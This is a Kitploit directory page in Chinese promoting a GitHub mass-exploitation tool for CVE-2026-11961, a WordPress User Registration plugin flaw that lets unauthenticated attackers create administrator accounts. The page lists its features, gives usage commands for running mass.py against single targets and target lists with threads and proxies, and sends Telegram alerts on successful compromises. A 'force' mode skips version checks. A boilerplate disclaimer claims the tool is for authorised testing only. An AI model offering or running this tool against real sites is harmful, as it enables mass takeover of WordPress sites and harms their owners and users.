Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-11961 — CVE-2026-11961 — UserRegistration:WordPress 用户注册 <= 5.2.2 权限提升。成员角色配置错误 → 未认证管理员创建 → 站点沦陷。CVSS 8.1 | Kitploit
工具/GitHubGitHub/johenlastgen-jlg/cve-2026-11961
权限提升漏洞扫描器漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试错误配置
GitHubjohenlastgen-jlg/cve-2026-11961

CVE-2026-11961

CVE-2026-11961 — UserRegistration:WordPress 用户注册 <= 5.2.2 权限提升。成员角色配置错误 → 未认证管理员创建 → 站点沦陷。CVSS 8.1

查看仓库
171个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-11961

针对影响 WordPress User Registration & Membership 插件的 CVE-2026-11961 的大规模利用工具。

功能

  • 插件版本检测
  • 单目标支持
  • 批量目标处理
  • 多线程支持
  • 随机或自定义凭据
  • HTTP/HTTPS 代理支持
  • 请求超时配置
  • JSONL 输出
  • 日志文件支持
  • Telegram 通知
  • 强制模式 (--force)

用法

root@kitploit:~
# Show help
python3 mass.py -h

# Single target
python3 mass.py -u https://target.com

# Single target with custom credentials
python3 mass.py \
-u https://target.com \
--username admin \
--password "StrongPassword123!"

# Multiple targets
python3 mass.py -l targets.txt -t 20

# Save successful results
python3 mass.py -l targets.txt -o results.jsonl

# Write log file
python3 mass.py -l targets.txt --log exploit.log

# Telegram notifications
python3 mass.py \
-l targets.txt \
--tg-token YOUR_BOT_TOKEN \
--tg-chat YOUR_CHAT_ID

# Proxy
python3 mass.py \
-u https://target.com \
--proxy http://127.0.0.1:8080

# Force mode
python3 mass.py -u https://target.com --force

选项

免责声明

本项目仅用于授权的安全评估、防御性安全研究和漏洞验证。

使用本软件即表示您确认已获得明确授权对目标系统进行评估。未经授权访问计算机系统是被禁止的,并可能违反适用法律。

作者和贡献者不鼓励也不纵容未经授权使用本项目,并且不对因使用本项目而产生的任何滥用、损害或法律后果承担任何责任或义务。

作者

JohenLastGen JLG NETWORK

下载工具
选项描述
-h, --help显示帮助信息并退出
-u, --url单个目标 URL
-l, --list包含目标 URL 的文件(每行一个)
--username管理员用户名(默认:随机生成)
--password管理员密码(默认:随机生成)
-t, --threads并发线程数(默认:5)
--timeout请求超时时间(秒)(默认:15)
-o, --output将成功结果保存到 JSONL 文件
--log将控制台日志保存到文件
--proxyHTTP/HTTPS 代理(例如 http://127.0.0.1:8080)
--force跳过版本验证并继续处理
--tg-tokenTelegram 机器人令牌
--tg-chatTelegram 聊天 ID